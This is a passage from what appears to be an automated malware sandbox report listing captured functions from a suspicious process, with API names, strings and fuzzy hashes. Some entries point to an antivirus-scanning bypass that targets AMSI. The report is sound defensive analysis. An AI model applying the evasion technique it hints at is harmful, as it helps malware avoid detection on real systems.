                          • Associated: 00000015.00000002.2535656225.000001F1197F0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2536508994.000001F1197F2000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2537377329.000001F1197F9000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_1f1197d0000_cmd.jbxd
                          Similarity
                          • API ID: ErrorLast$Value$FreeHeap
                          • String ID:
                          • API String ID: 365477584-0
                          • Opcode ID: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
                          • Instruction ID: e8fc113ae2b1cb42df996ba3c7de8adfa5d73b9b0d8b1ca02dfd0af3401d8ced
                          • Opcode Fuzzy Hash: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
                          • Instruction Fuzzy Hash: 54113D33719252E2FA14673169153FE1293AF867E0FD85634EB77667C6DE28D4094A00
                          APIs
                          Memory Dump Source
                          • Source File: 00000015.00000002.2546953403.000001F119D51000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F119D50000, based on PE: true
                          • Associated: 00000015.00000002.2546116951.000001F119D50000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2547995359.000001F119D65000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2548880954.000001F119D70000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2549743871.000001F119D72000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2550601758.000001F119D79000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_1f119d50000_cmd.jbxd
                          Similarity
                          • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                          • String ID:
                          • API String ID: 517849248-0
                          • Opcode ID: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
                          • Instruction ID: 90bf8292887878d8c763d793f8694db0327fb96419f740c86917638109e6b967
                          • Opcode Fuzzy Hash: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
                          • Instruction Fuzzy Hash: AC012135708B46D6EB14DB22A4543A963A2F789FC0FC840359F6E43754DE3CC586C780
                          APIs
                          Memory Dump Source
                          • Source File: 00000015.00000002.2533636230.000001F1197D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F1197D0000, based on PE: true
                          • Associated: 00000015.00000002.2532788564.000001F1197D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2534807754.000001F1197E5000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2535656225.000001F1197F0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2536508994.000001F1197F2000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2537377329.000001F1197F9000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_1f1197d0000_cmd.jbxd
                          Similarity
                          • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                          • String ID:
                          • API String ID: 517849248-0
                          • Opcode ID: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
                          • Instruction ID: 93350730d6b378c501c797d764fc87c24703a75bb55042980683b9fd6ffa39d7
                          • Opcode Fuzzy Hash: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
                          • Instruction Fuzzy Hash: 24012131708B55D6EB14DB22A9543A963A2FB88FC4F884035DF6E43754EE3CC949CB80
                          APIs
                          Memory Dump Source
                          • Source File: 00000015.00000002.2546953403.000001F119D51000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F119D50000, based on PE: true
                          • Associated: 00000015.00000002.2546116951.000001F119D50000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2547995359.000001F119D65000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2548880954.000001F119D70000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2549743871.000001F119D72000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2550601758.000001F119D79000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_1f119d50000_cmd.jbxd
                          Similarity
                          • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                          • String ID:
                          • API String ID: 449555515-0
                          • Opcode ID: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
                          • Instruction ID: ad35506284549831691e1f3eb5af683a5fdc7384d5e3dca1a9b69a9af9ff8382
                          • Opcode Fuzzy Hash: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
                          • Instruction Fuzzy Hash: 15012D75219B8AD2FF249B71E9487A973A2BB45B45F840138DB6E06364EF3DC088C780
                          APIs
                          Memory Dump Source
                          • Source File: 00000015.00000002.2533636230.000001F1197D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F1197D0000, based on PE: true
                          • Associated: 00000015.00000002.2532788564.000001F1197D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2534807754.000001F1197E5000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2535656225.000001F1197F0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2536508994.000001F1197F2000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2537377329.000001F1197F9000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_1f1197d0000_cmd.jbxd
                          Similarity
                          • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                          • String ID:
                          • API String ID: 449555515-0
                          • Opcode ID: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
                          • Instruction ID: 42212b4db22fac93fae1daa25f7c2fd437d278ecf532debb05d6bbdeeaee4e5b
                          • Opcode Fuzzy Hash: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
                          • Instruction Fuzzy Hash: 89010975219746D2EF249B35E8487A962A2BF86B85F940034DB6E063A4EF3DC44CCB41
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.2546953403.000001F119D51000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F119D50000, based on PE: true
                          • Associated: 00000015.00000002.2546116951.000001F119D50000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2547995359.000001F119D65000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2548880954.000001F119D70000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2549743871.000001F119D72000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2550601758.000001F119D79000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_1f119d50000_cmd.jbxd
                          Similarity
                          • API ID: FinalHandleNamePathlstrlen
                          • String ID: \\?\
                          • API String ID: 2719912262-4282027825
                          • Opcode ID: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
                          • Instruction ID: 8552a58c292d64d3b96bf97c84ac928d893fac020917a3e998aeb00a4c52ae49
                          • Opcode Fuzzy Hash: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
                          • Instruction Fuzzy Hash: C4F04F7230868AE2FF208F31F5843A96372F745BC8FC44035DB5A46954DE6CC688CB40
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.2533636230.000001F1197D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F1197D0000, based on PE: true
                          • Associated: 00000015.00000002.2532788564.000001F1197D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2534807754.000001F1197E5000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2535656225.000001F1197F0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2536508994.000001F1197F2000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2537377329.000001F1197F9000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_1f1197d0000_cmd.jbxd
                          Similarity
                          • API ID: FinalHandleNamePathlstrlen
                          • String ID: \\?\
                          • API String ID: 2719912262-4282027825
                          • Opcode ID: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
                          • Instruction ID: cbd3ff801cab0db56494ad77b16c5690f9502d8c90fe2573cdb34ee3c3b508be
                          • Opcode Fuzzy Hash: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
                          • Instruction Fuzzy Hash: 9EF04F7230869AE2EB208B35F5843A96362FB44BC8FC44035DB6A46954EE7DC68CCF00
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.2546953403.000001F119D51000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F119D50000, based on PE: true
                          • Associated: 00000015.00000002.2546116951.000001F119D50000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2547995359.000001F119D65000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2548880954.000001F119D70000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2549743871.000001F119D72000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2550601758.000001F119D79000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_1f119d50000_cmd.jbxd
                          Similarity
                          • API ID: AddressFreeHandleLibraryModuleProc
                          • String ID: CorExitProcess$mscoree.dll
                          • API String ID: 4061214504-1276376045
                          • Opcode ID: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
                          • Instruction ID: 635f1a669ebb73b13ff402a909f102c3afc2e53c6369ca91dde3e08c75266cbd
                          • Opcode Fuzzy Hash: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
                          • Instruction Fuzzy Hash: 80F01D7121964AE1FF148F34A8953B96372AB897A0FD40639DB7B455E8DF3DC488CB80
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.2546953403.000001F119D51000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F119D50000, based on PE: true
                          • Associated: 00000015.00000002.2546116951.000001F119D50000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2547995359.000001F119D65000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2548880954.000001F119D70000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2549743871.000001F119D72000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2550601758.000001F119D79000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_1f119d50000_cmd.jbxd
                          Similarity
                          • API ID: CombinePath
                          • String ID: \\.\pipe\
                          • API String ID: 3422762182-91387939
                          • Opcode ID: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
                          • Instruction ID: e810479e23e637bff84b70c39f119b15e133311f6d13ac21fb57fea9d7376835
                          • Opcode Fuzzy Hash: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
                          • Instruction Fuzzy Hash: A2F05474708B8AD2EE148B72B9141A5A262A748FC0FC44034EF2707714DE28C485C740
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.2533636230.000001F1197D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F1197D0000, based on PE: true
                          • Associated: 00000015.00000002.2532788564.000001F1197D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2534807754.000001F1197E5000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2535656225.000001F1197F0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2536508994.000001F1197F2000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2537377329.000001F1197F9000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_1f1197d0000_cmd.jbxd
                          Similarity
                          • API ID: AddressFreeHandleLibraryModuleProc
                          • String ID: CorExitProcess$mscoree.dll
                          • API String ID: 4061214504-1276376045
                          • Opcode ID: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
                          • Instruction ID: 8a1376443e971a596884637b1c71841854bd4ccc17046b5f9150aa7467e27495
                          • Opcode Fuzzy Hash: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
                          • Instruction Fuzzy Hash: D0F03072319656E1EE148B34A8953B963A6EF897E0FD40639DB7B495E4DF2CC44CCB00
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.2533636230.000001F1197D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F1197D0000, based on PE: true
                          • Associated: 00000015.00000002.2532788564.000001F1197D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2534807754.000001F1197E5000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2535656225.000001F1197F0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2536508994.000001F1197F2000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2537377329.000001F1197F9000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_1f1197d0000_cmd.jbxd
                          Similarity
                          • API ID: CombinePath
                          • String ID: \\.\pipe\
                          • API String ID: 3422762182-91387939
                          • Opcode ID: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
                          • Instruction ID: 79606d619097c5c076505ce5ae3f690df5618a6af76cc1b8d88d1ec43b78d385
                          • Opcode Fuzzy Hash: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
                          • Instruction Fuzzy Hash: 1CF08975708B96E1EE548B33B9541B95252BF48FC4FC44031EF2707B14EE2CC4498B00
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.2546953403.000001F119D51000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F119D50000, based on PE: true
                          • Associated: 00000015.00000002.2546116951.000001F119D50000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2547995359.000001F119D65000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2548880954.000001F119D70000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2549743871.000001F119D72000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2550601758.000001F119D79000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_1f119d50000_cmd.jbxd
                          Similarity
                          • API ID: AddressLibraryLoadProcSleep
                          • String ID: AmsiScanBuffer$amsi.dll
                          • API String ID: 188063004-3248079830
                          • Opcode ID: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                          • Instruction ID: 78c4c231efcc6ef220593c037e25ec94aa00fd9cb3d5b68f438408f4984c9035
                          • Opcode Fuzzy Hash: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                          • Instruction Fuzzy Hash: 01D06730A1964AF5FE086F31E8543F42273BB64B41FC44435C72F012A0DE2CC599C380
                          APIs
                          Memory Dump Source
                          • Source File: 00000015.00000002.2546953403.000001F119D51000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F119D50000, based on PE: true
                          • Associated: 00000015.00000002.2546116951.000001F119D50000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2547995359.000001F119D65000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2548880954.000001F119D70000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2549743871.000001F119D72000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2550601758.000001F119D79000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_1f119d50000_cmd.jbxd
                          Similarity
                          • API ID: CurrentThread
                          • String ID:
                          • API String ID: 2882836952-0
                          • Opcode ID: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
                          • Instruction ID: 4bdd4982941be1181e3666a2caf18238d183a8bbbfc7684af560c43f27619514
                          • Opcode Fuzzy Hash: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
                          • Instruction Fuzzy Hash: 9602B83621DB85D6EB61CB65E4903AAB7B1F384794F904025EB9E87BA8DF7CC454CB00
                          APIs
                          Memory Dump Source
                          • Source File: 00000015.00000002.2533636230.000001F1197D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F1197D0000, based on PE: true
                          • Associated: 00000015.00000002.2532788564.000001F1197D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2534807754.000001F1197E5000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2535656225.000001F1197F0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2536508994.000001F1197F2000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2537377329.000001F1197F9000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_1f1197d0000_cmd.jbxd
                          Similarity
                          • API ID: CurrentThread
                          • String ID:
                          • API String ID: 2882836952-0
                          • Opcode ID: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
                          • Instruction ID: 8bf76e9ed8b7a9df262ee4c92949d0c5c8141740679972bc7da9694d46b287b1
                          • Opcode Fuzzy Hash: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
                          • Instruction Fuzzy Hash: B902B83621DB85D6E7608B65E4903AEB7A1F7C4B94F504025EB9E87BA8DF78C458CF00
                          APIs
                          Memory Dump Source
                          • Source File: 00000015.00000002.2546953403.000001F119D51000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F119D50000, based on PE: true
                          • Associated: 00000015.00000002.2546116951.000001F119D50000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2547995359.000001F119D65000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2548880954.000001F119D70000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2549743871.000001F119D72000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2550601758.000001F119D79000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_1f119d50000_cmd.jbxd
                          Similarity
                          • API ID: Value
                          • String ID:
                          • API String ID: 3702945584-0
                          • Opcode ID: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
                          • Instruction ID: 8923fe9165c6dcb316e261b7006bdc95f20c05698ae96fc2f94ca465734b02b2
                          • Opcode Fuzzy Hash: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
                          • Instruction Fuzzy Hash: 96515335618646E7EB64CB36E4406BAB3B6F784B84F904139AF6B43754DF38C949CB40
                          APIs
                          Memory Dump Source
                          • Source File: 00000015.00000002.2533636230.000001F1197D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F1197D0000, based on PE: true
                          • Associated: 00000015.00000002.2532788564.000001F1197D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2534807754.000001F1197E5000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2535656225.000001F1197F0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2536508994.000001F1197F2000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2537377329.000001F1197F9000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_1f1197d0000_cmd.jbxd
                          Similarity
                          • API ID: Value
                          • String ID:
                          • API String ID: 3702945584-0
                          • Opcode ID: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
                          • Instruction ID: a51ed8b8a4b9c674abbe6fbbf88e13268596f3924a008aa4d3717c90ffd45fb3
                          • Opcode Fuzzy Hash: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
                          • Instruction Fuzzy Hash: 16516E36608602E7E764CB26A4546AE73A2FB89BD4F904139DF6B43754DB38C84ACF40
                          APIs
                          Memory Dump Source
                          • Source File: 00000015.00000002.2546953403.000001F119D51000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F119D50000, based on PE: true
                          • Associated: 00000015.00000002.2546116951.000001F119D50000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2547995359.000001F119D65000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2548880954.000001F119D70000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2549743871.000001F119D72000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2550601758.000001F119D79000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_1f119d50000_cmd.jbxd
                          Similarity
                          • API ID: Value
                          • String ID:
                          • API String ID: 3702945584-0
                          • Opcode ID: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
                          • Instruction ID: fa9b28e2b4d86fc6fd49d8dec0697fd20958d027a5e362716a24ad52205b72fa
                          • Opcode Fuzzy Hash: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
                          • Instruction Fuzzy Hash: AF514435618646E7EB24CF36A8406B9B3B2F785B84F904129EF6B43758DF38D949CB40
                          APIs
                          Memory Dump Source
                          • Source File: 00000015.00000002.2533636230.000001F1197D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F1197D0000, based on PE: true
                          • Associated: 00000015.00000002.2532788564.000001F1197D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2534807754.000001F1197E5000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2535656225.000001F1197F0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2536508994.000001F1197F2000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2537377329.000001F1197F9000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_1f1197d0000_cmd.jbxd
                          Similarity
                          • API ID: Value
                          • String ID:
                          • API String ID: 3702945584-0
                          • Opcode ID: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
                          • Instruction ID: 7c1a810be19e154511d0584d9644d7746da96506bfb15c7a21f42d1dc8d54db4
                          • Opcode Fuzzy Hash: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
                          • Instruction Fuzzy Hash: A7514036218642E6E724DF36A4406BA73A2FB85BD4F904129DF6B43754EB79C84ACF00
                          APIs
                          Memory Dump Source
                          • Source File: 00000015.00000002.2546953403.000001F119D51000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F119D50000, based on PE: true
                          • Associated: 00000015.00000002.2546116951.000001F119D50000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2547995359.000001F119D65000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2548880954.000001F119D70000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2549743871.000001F119D72000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2550601758.000001F119D79000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_1f119d50000_cmd.jbxd
                          Similarity
                          • API ID: CurrentThread
                          • String ID:
                          • API String ID: 2882836952-0
                          • Opcode ID: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
                          • Instruction ID: 703432165de24b7b3b95c45a5b736cc0d8453b7410889a74678311cba07cdb7a
                          • Opcode Fuzzy Hash: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
                          • Instruction Fuzzy Hash: DC61BC3612DB89D6FB658B25E45436AB7B1F388748F900125FB9E87BA8DB7CC540CB00
                          APIs
                          Memory Dump Source
                          • Source File: 00000015.00000002.2533636230.000001F1197D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F1197D0000, based on PE: true
                          • Associated: 00000015.00000002.2532788564.000001F1197D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2534807754.000001F1197E5000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2535656225.000001F1197F0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2536508994.000001F1197F2000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2537377329.000001F1197F9000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_1f1197d0000_cmd.jbxd
                          Similarity
                          • API ID: CurrentThread
                          • String ID:
                          • API String ID: 2882836952-0
                          • Opcode ID: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
                          • Instruction ID: 9030f3efd319100d5c301f7f20aa3f71b4970118bf80dd58d812ca04f110e1c7
                          • Opcode Fuzzy Hash: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
                          • Instruction Fuzzy Hash: FB61D83612CB41D7E7608B25E44476EB7E2F788784F900126EB9E47BA8DB78C5488F01
                          APIs
                          Memory Dump Source
                          • Source File: 00000015.00000002.2546953403.000001F119D51000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F119D50000, based on PE: true
                          • Associated: 00000015.00000002.2546116951.000001F119D50000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2547995359.000001F119D65000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2548880954.000001F119D70000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2549743871.000001F119D72000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2550601758.000001F119D79000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_1f119d50000_cmd.jbxd
                          Similarity
                          • API ID: CurrentProcessProtectVirtual$HandleModule
                          • String ID:
                          • API String ID: 1092925422-0
                          • Opcode ID: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                          • Instruction ID: 93901da63dc3498e1e2902e7421700ce0deacc901b14a31596839f061cd07c77
                          • Opcode Fuzzy Hash: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                          • Instruction Fuzzy Hash: D8111C36609746E3FF248B61E4042AAA7B1FB45B80F840136DB6E03794EF7DC994C784
                          APIs
                          Memory Dump Source
                          • Source File: 00000015.00000002.2533636230.000001F1197D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F1197D0000, based on PE: true
                          • Associated: 00000015.00000002.2532788564.000001F1197D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2534807754.000001F1197E5000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2535656225.000001F1197F0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2536508994.000001F1197F2000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2537377329.000001F1197F9000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
